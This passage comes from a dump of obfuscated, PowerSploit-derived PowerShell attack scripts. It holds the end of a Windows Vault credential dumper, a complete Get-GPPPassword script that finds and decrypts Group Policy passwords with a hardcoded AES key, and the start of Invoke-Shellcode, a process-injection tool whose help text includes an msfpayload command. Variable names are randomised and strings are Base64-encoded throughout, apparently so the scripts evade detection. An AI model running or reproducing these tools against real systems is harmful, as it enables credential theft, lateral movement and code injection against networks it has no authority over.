231 | ${3422e1ed3b09486bb38afaf666e5f736} = [IntPtr]::Zero 232 | ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultEnumerateItems(${34c503abdf824ff9bb9e662b1da95cf4}, 512, [Ref] ${d55006db11114242a5777a6348d5bbd5}, [Ref] ${3422e1ed3b09486bb38afaf666e5f736}) 233 | if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0) 234 | { 235 | $null = ${208b5b442263465081f8b114a5784fcf}::VaultCloseVault([Ref] ${34c503abdf824ff9bb9e662b1da95cf4}) 236 | Write-Error "Unable to enumerate vault items from the following vault: $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]). Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))" 237 | continue 238 | } 239 | ${4d7c47515f0b42e788329f442342706c} = ${3422e1ed3b09486bb38afaf666e5f736} 240 | if (${d55006db11114242a5777a6348d5bbd5}) 241 | { 242 | foreach ($j in 1..${d55006db11114242a5777a6348d5bbd5}) 243 | { 244 | ${12854c7cf3554f48b8f7ba7fd8301150} = [Runtime.InteropServices.Marshal]::PtrToStructure(${4d7c47515f0b42e788329f442342706c}, [Type] ${f2d61ec8abbe45409ddbd8773eb71409}) 245 | ${4d7c47515f0b42e788329f442342706c} = [IntPtr] (${4d7c47515f0b42e788329f442342706c}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] ${f2d61ec8abbe45409ddbd8773eb71409})) 246 | ${90eaee31c17d44e19fbab5b9722ce6b8} = [IntPtr]::Zero 247 | if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2) 248 | { 249 | ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultGetItem(${34c503abdf824ff9bb9e662b1da95cf4}, 250 | [Ref] ${12854c7cf3554f48b8f7ba7fd8301150}.SchemaId, 251 | ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement, 252 | ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement, 253 | ${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid, 254 | [IntPtr]::Zero, 255 | 0, 256 | [Ref] ${90eaee31c17d44e19fbab5b9722ce6b8}) 257 | } 258 | else 259 | { 260 | ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultGetItem(${34c503abdf824ff9bb9e662b1da95cf4}, 261 | [Ref] ${12854c7cf3554f48b8f7ba7fd8301150}.SchemaId, 262 | ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement, 263 | ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement, 264 | [IntPtr]::Zero, 265 | 0, 266 | [Ref] ${90eaee31c17d44e19fbab5b9722ce6b8}) 267 | } 268 | ${c0dfec4826e949428ac400c44f17acd3} = $null 269 | if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0) 270 | { 271 | Write-Error "Error occured retrieving vault item. Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))" 272 | continue 273 | } 274 | else 275 | { 276 | ${c0dfec4826e949428ac400c44f17acd3} = [Runtime.InteropServices.Marshal]::PtrToStructure(${90eaee31c17d44e19fbab5b9722ce6b8}, [Type] ${f2d61ec8abbe45409ddbd8773eb71409}) 277 | } 278 | if (${a49e774fea8b4e23905aabb599ed6413}.ContainsKey(${fee04732c23a47ecacf759098477b7c2})) 279 | { 280 | ${6d6565286bd247ea9ce35ef454c6bff0} = ${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}] 281 | } 282 | else 283 | { 284 | ${6d6565286bd247ea9ce35ef454c6bff0} = ${fee04732c23a47ecacf759098477b7c2} 285 | } 286 | if (${c0dfec4826e949428ac400c44f17acd3}.pAuthenticatorElement -ne [IntPtr]::Zero) 287 | { 288 | ${4d48240fee0e491fb5f033c271c12a21} = Get-VaultElementValue ${c0dfec4826e949428ac400c44f17acd3}.pAuthenticatorElement 289 | } 290 | else 291 | { 292 | ${4d48240fee0e491fb5f033c271c12a21} = $null 293 | } 294 | ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc} = $null 295 | if (${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid -and (${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid -ne [IntPtr]::Zero)) 296 | { 297 | ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc} = Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid 298 | } 299 | ${d531d996545645a088706457d3807a34} = @{ 300 | Vault = ${6d6565286bd247ea9ce35ef454c6bff0} 301 | Resource = if (${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement) { Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement } else { $null } 302 | Identity = if (${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement) { Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement } else { $null } 303 | PackageSid = ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc} 304 | Credential = ${4d48240fee0e491fb5f033c271c12a21} 305 | LastModified = [DateTime]::FromFileTimeUtc(${12854c7cf3554f48b8f7ba7fd8301150}.LastModified) 306 | } 307 | ${ae1e01228c4e47fe9920e3715d774bb4} = New-Object PSObject -Property ${d531d996545645a088706457d3807a34} 308 | ${ae1e01228c4e47fe9920e3715d774bb4}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBBAFUATABUAEMATABJAC4AVgBBAFUATABUAEkAVABFAE0A'))) 309 | ${ae1e01228c4e47fe9920e3715d774bb4} 310 | $null = ${208b5b442263465081f8b114a5784fcf}::VaultFree(${90eaee31c17d44e19fbab5b9722ce6b8}) 311 | } 312 | } 313 | $null = ${208b5b442263465081f8b114a5784fcf}::VaultCloseVault([Ref] ${34c503abdf824ff9bb9e662b1da95cf4}) 314 | } 315 | } 316 | } 317 | -------------------------------------------------------------------------------- /Invoke-GPPPassword.ps1: -------------------------------------------------------------------------------- 1 | function Get-GPPPassword { 2 | <# 3 | .SYNOPSIS 4 | 5 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. 6 | 7 | PowerSploit Function: Get-GPPPassword 8 | Author: Chris Campbell (@obscuresec) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | 13 | .DESCRIPTION 14 | 15 | Get-GPPPassword searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. 16 | 17 | .EXAMPLE 18 | 19 | PS C:\> Get-GPPPassword 20 | 21 | NewName : [BLANK] 22 | Changed : {2014-02-21 05:28:53} 23 | Passwords : {password12} 24 | UserNames : {test1} 25 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml 26 | 27 | NewName : {mspresenters} 28 | Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} 29 | Passwords : {Recycling*3ftw!, password123, password1234} 30 | UserNames : {Administrator (built-in), DummyAccount, dummy2} 31 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml 32 | 33 | NewName : [BLANK] 34 | Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} 35 | Passwords : {password, password1234$} 36 | UserNames : {administrator, admin} 37 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml 38 | 39 | NewName : [BLANK] 40 | Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} 41 | Passwords : {password, read123} 42 | UserNames : {DEMO\Administrator, admin} 43 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml 44 | 45 | .EXAMPLE 46 | 47 | PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq 48 | 49 | password 50 | password12 51 | password123 52 | password1234 53 | password1234$ 54 | read123 55 | Recycling*3ftw! 56 | 57 | .LINK 58 | 59 | http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html 60 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 61 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences 62 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html 63 | #> 64 | [CmdletBinding()] 65 | Param () 66 | Set-StrictMode -Version 2 67 | function Get-DecryptedCpassword { 68 | [CmdletBinding()] 69 | Param ( 70 | [string] ${e4aae6794a454054ab0e31882001249c} 71 | ) 72 | try { 73 | ${205bb5891ffe47f5b576b5bbe1811082} = (${e4aae6794a454054ab0e31882001249c}.length % 4) 74 | switch (${205bb5891ffe47f5b576b5bbe1811082}) { 75 | '1' {${e4aae6794a454054ab0e31882001249c} = ${e4aae6794a454054ab0e31882001249c}.Substring(0,${e4aae6794a454054ab0e31882001249c}.Length -1)} 76 | '2' {${e4aae6794a454054ab0e31882001249c} += ('=' * (4 - ${205bb5891ffe47f5b576b5bbe1811082}))} 77 | '3' {${e4aae6794a454054ab0e31882001249c} += ('=' * (4 - ${205bb5891ffe47f5b576b5bbe1811082}))} 78 | } 79 | ${2beff11a79b9489db2695bbc9c70d3b6} = [Convert]::FromBase64String(${e4aae6794a454054ab0e31882001249c}) 80 | ${0b8fd8afaef146ef856ffdf1593f5587} = New-Object System.Security.Cryptography.AesCryptoServiceProvider 81 | [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 82 | 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) 83 | ${fa2e77277a0e43cb89bb5a2e099cb613} = New-Object Byte[](${0b8fd8afaef146ef856ffdf1593f5587}.IV.Length) 84 | ${0b8fd8afaef146ef856ffdf1593f5587}.IV = ${fa2e77277a0e43cb89bb5a2e099cb613} 85 | ${0b8fd8afaef146ef856ffdf1593f5587}.Key = $AesKey 86 | ${91bd48cd909f4b91a7f46f9969d0001d} = ${0b8fd8afaef146ef856ffdf1593f5587}.CreateDecryptor() 87 | [Byte[]] $OutBlock = ${91bd48cd909f4b91a7f46f9969d0001d}.TransformFinalBlock(${2beff11a79b9489db2695bbc9c70d3b6}, 0, ${2beff11a79b9489db2695bbc9c70d3b6}.length) 88 | return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) 89 | } 90 | catch {Write-Error $Error[0]} 91 | } 92 | function Get-GPPInnerFields { 93 | [CmdletBinding()] 94 | Param ( 95 | ${b1372a912a6c4da5b57ac2089f6eb19b} 96 | ) 97 | try { 98 | ${5e1021a707344c0e91486ac863355fda} = Split-Path ${b1372a912a6c4da5b57ac2089f6eb19b} -Leaf 99 | [xml] $Xml = gc (${b1372a912a6c4da5b57ac2089f6eb19b}) 100 | ${e4aae6794a454054ab0e31882001249c} = @() 101 | ${aae7b762662c4728a463d10885e00a19} = @() 102 | ${0c502df0b6474f4d8f075877af0af87d} = @() 103 | ${b4166a3f22e74d49aad4b9e8ed582950} = @() 104 | ${3c1ee35bd9b94daba7c6354654745097} = @() 105 | if ($Xml.innerxml -like $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KgBjAHAAYQBzAHMAdwBvAHIAZAAqAA==')))){ 106 | Write-Verbose "Potential password in ${b1372a912a6c4da5b57ac2089f6eb19b}" 107 | switch (${5e1021a707344c0e91486ac863355fda}) { 108 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwByAG8AdQBwAHMALgB4AG0AbAA='))) { 109 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABjAHAAYQBzAHMAdwBvAHIAZAA='))) | select -Expand Node | % {$_.Value} 110 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQAB1AHMAZQByAE4AYQBtAGUA'))) | select -Expand Node | % {$_.Value} 111 | ${0c502df0b6474f4d8f075877af0af87d} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABuAGUAdwBOAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 112 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBAAGMAaABhAG4AZwBlAGQA'))) | select -Expand Node | % {$_.Value} 113 | } 114 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHIAdgBpAGMAZQBzAC4AeABtAGwA'))) { 115 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABjAHAAYQBzAHMAdwBvAHIAZAA='))) | select -Expand Node | % {$_.Value} 116 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABhAGMAYwBvAHUAbgB0AE4AYQBtAGUA'))) | select -Expand Node | % {$_.Value} 117 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBAAGMAaABhAG4AZwBlAGQA'))) | select -Expand Node | % {$_.Value} 118 | } 119 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAdABhAHMAawBzAC4AeABtAGwA'))) { 120 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 121 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAcgB1AG4AQQBzAA=='))) | select -Expand Node | % {$_.Value} 122 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 123 | } 124 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAHQAYQBTAG8AdQByAGMAZQBzAC4AeABtAGwA'))) { 125 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 126 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAdQBzAGUAcgBuAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 127 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 128 | } 129 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAbgB0AGUAcgBzAC4AeABtAGwA'))) { 130 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 131 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAdQBzAGUAcgBuAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 132 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 133 | } 134 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAByAGkAdgBlAHMALgB4AG0AbAA='))) { 135 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAFAAcgBvAHAAZQByAHQAaQBlAHMALwBAAGMAcABhAHMAcwB3AG8AcgBkAA=='))) | select -Expand Node | % {$_.Value} 136 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAFAAcgBvAHAAZQByAHQAaQBlAHMALwBAAHUAcwBlAHIAbgBhAG0AZQA='))) | select -Expand Node | % {$_.Value} 137 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAEAAYwBoAGEAbgBnAGUAZAA='))) | select -Expand Node | % {$_.Value} 138 | } 139 | } 140 | } 141 | foreach ($Pass in ${e4aae6794a454054ab0e31882001249c}) { 142 | Write-Verbose "Decrypting $Pass" 143 | ${21604aea1ec54a688b80a97d1c38ab95} = Get-DecryptedCpassword $Pass 144 | Write-Verbose "Decrypted a password of ${21604aea1ec54a688b80a97d1c38ab95}" 145 | ${3c1ee35bd9b94daba7c6354654745097} += , ${21604aea1ec54a688b80a97d1c38ab95} 146 | } 147 | if (!(${3c1ee35bd9b94daba7c6354654745097})) {${3c1ee35bd9b94daba7c6354654745097} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 148 | if (!(${aae7b762662c4728a463d10885e00a19})) {${aae7b762662c4728a463d10885e00a19} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 149 | if (!(${b4166a3f22e74d49aad4b9e8ed582950})) {${b4166a3f22e74d49aad4b9e8ed582950} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 150 | if (!(${0c502df0b6474f4d8f075877af0af87d})) {${0c502df0b6474f4d8f075877af0af87d} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 151 | ${98e95e02299745609b19392a6259cb51} = @{'Passwords' = ${3c1ee35bd9b94daba7c6354654745097}; 152 | 'UserNames' = ${aae7b762662c4728a463d10885e00a19}; 153 | 'Changed' = ${b4166a3f22e74d49aad4b9e8ed582950}; 154 | 'NewName' = ${0c502df0b6474f4d8f075877af0af87d}; 155 | 'File' = ${b1372a912a6c4da5b57ac2089f6eb19b}} 156 | ${069964c2c7d14dad9c2b57e19a7a4099} = New-Object -TypeName PSObject -Property ${98e95e02299745609b19392a6259cb51} 157 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAIABwAGEAcwBzAHcAbwByAGQAIABpAHMAIABiAGUAdAB3AGUAZQBuACAAewB9ACAAYQBuAGQAIABtAGEAeQAgAGIAZQAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGUAIAB2AGEAbAB1AGUALgA='))) 158 | if (${069964c2c7d14dad9c2b57e19a7a4099}) {Return ${069964c2c7d14dad9c2b57e19a7a4099}} 159 | } 160 | catch {Write-Error $Error[0]} 161 | } 162 | try { 163 | if ( ( ((gwmi Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { 164 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQAgAGkAcwAgAG4AbwB0ACAAYQAgAGQAbwBtAGEAaQBuACAAbQBlAG0AYgBlAHIAIABvAHIAIABVAHMAZQByACAAaQBzACAAbgBvAHQAIABhACAAbQBlAG0AYgBlAHIAIABvAGYAIAB0AGgAZQAgAGQAbwBtAGEAaQBuAC4A'))) 165 | } 166 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGEAcgBjAGgAaQBuAGcAIAB0AGgAZQAgAEQAQwAuACAAVABoAGkAcwAgAGMAbwB1AGwAZAAgAHQAYQBrAGUAIABhACAAdwBoAGkAbABlAC4A'))) 167 | ${8a83da17e81e465a99ef9e9a98706449} = ls -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwByAG8AdQBwAHMALgB4AG0AbAA='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHIAdgBpAGMAZQBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAdABhAHMAawBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAHQAYQBTAG8AdQByAGMAZQBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAbgB0AGUAcgBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAByAGkAdgBlAHMALgB4AG0AbAA='))) 168 | if ( -not ${8a83da17e81e465a99ef9e9a98706449} ) {throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAGYAaQBsAGUAcwAgAGYAbwB1AG4AZAAuAA==')))} 169 | Write-Verbose "Found $(${8a83da17e81e465a99ef9e9a98706449} | measure | select -ExpandProperty Count) files that could contain passwords." 170 | foreach (${b1372a912a6c4da5b57ac2089f6eb19b} in ${8a83da17e81e465a99ef9e9a98706449}) { 171 | ${bb5b513521294a3aaa8d8c72789a026e} = (Get-GppInnerFields ${b1372a912a6c4da5b57ac2089f6eb19b}.Fullname) 172 | echo ${bb5b513521294a3aaa8d8c72789a026e} 173 | } 174 | } 175 | catch {Write-Error $Error[0]} 176 | } 177 | -------------------------------------------------------------------------------- /Invoke-Shellcode.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Shellcode 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. 7 | 8 | PowerSploit Function: Invoke-Shellcode 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre 17 | 18 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): 19 | 20 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- 21 | 22 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. 23 | 24 | .PARAMETER ProcessID 25 | 26 | Process ID of the process you want to inject shellcode into. 27 | 28 | .PARAMETER Shellcode 29 | 30 | Specifies an optional shellcode passed in as a byte array 31 | 32 | .PARAMETER Force 33 | 34 | Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act. 35 | 36 | .EXAMPLE 37 | 38 | C:\PS> Invoke-Shellcode -ProcessId 4274 39 | 40 | Description 41 | ----------- 42 | Inject shellcode into process ID 4274. 43 | 44 | .EXAMPLE 45 | 46 | C:\PS> Invoke-Shellcode 47 | 48 | Description 49 | ----------- 50 | Inject shellcode into the running instance of PowerShell. 51 | 52 | .EXAMPLE 53 | 54 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) 55 | 56 | Description 57 | ----------- 58 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) 59 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! 60 | #> 61 | [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param ( 62 | [ValidateNotNullOrEmpty()] 63 | [UInt16] 64 | ${a1c827e2c0ed4a4889805491350137e2}, 65 | [Parameter( ParameterSetName = 'RunLocal' )] 66 | [ValidateNotNullOrEmpty()] 67 | [Byte[]] 68 | ${da05bf47d70e468cb6812c76cc705015}, 69 | [Switch] 70 | ${bab5df81ac5040dbbbb4c01205f3b8e4} = $False 71 | ) 72 | Set-StrictMode -Version 2.0 73 | if ( $PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AYwBlAHMAcwBJAEQA')))] ) 74 | { 75 | ps -Id ${a1c827e2c0ed4a4889805491350137e2} -ErrorAction Stop | Out-Null 76 | } 77 | function Local:Get-DelegateType 78 | { 79 | Param 80 | ( 81 | [OutputType([Type])] 82 | [Parameter( Position = 0)] 83 | [Type[]] 84 | ${bb080aeaa9c14dd289ca1d3b20e4fda6} = (New-Object Type[](0)), 85 | [Parameter( Position = 1 )] 86 | [Type] 87 | ${da743f05712e4f02a41b906b7a9388d4} = [Void] 88 | ) 89 | ${71eb5891e394463096dc7fc8acf3fc73} = [AppDomain]::CurrentDomain 90 | ${39c43027fab24b0a875e3cc4784e463c} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlAA==')))) 91 | ${37613de083794f43bc0264300304466e} = ${71eb5891e394463096dc7fc8acf3fc73}.DefineDynamicAssembly(${39c43027fab24b0a875e3cc4784e463c}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 92 | ${9a1e2f639f084282bca9ee6a3998e64d} = ${37613de083794f43bc0264300304466e}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlAA=='))), $false) 93 | ${84781afc1aa84b9f8e5fdf7b5b0069c1} = ${9a1e2f639f084282bca9ee6a3998e64d}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQB5AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBsAGEAcwBzACwAIABQAHUAYgBsAGkAYwAsACAAUwBlAGEAbABlAGQALAAgAEEAbgBzAGkAQwBsAGEAcwBzACwAIABBAHUAdABvAEMAbABhAHMAcwA='))), [System.MulticastDelegate]) 94 | ${7679f70a96684b37801aad08b7b7d4ee} = 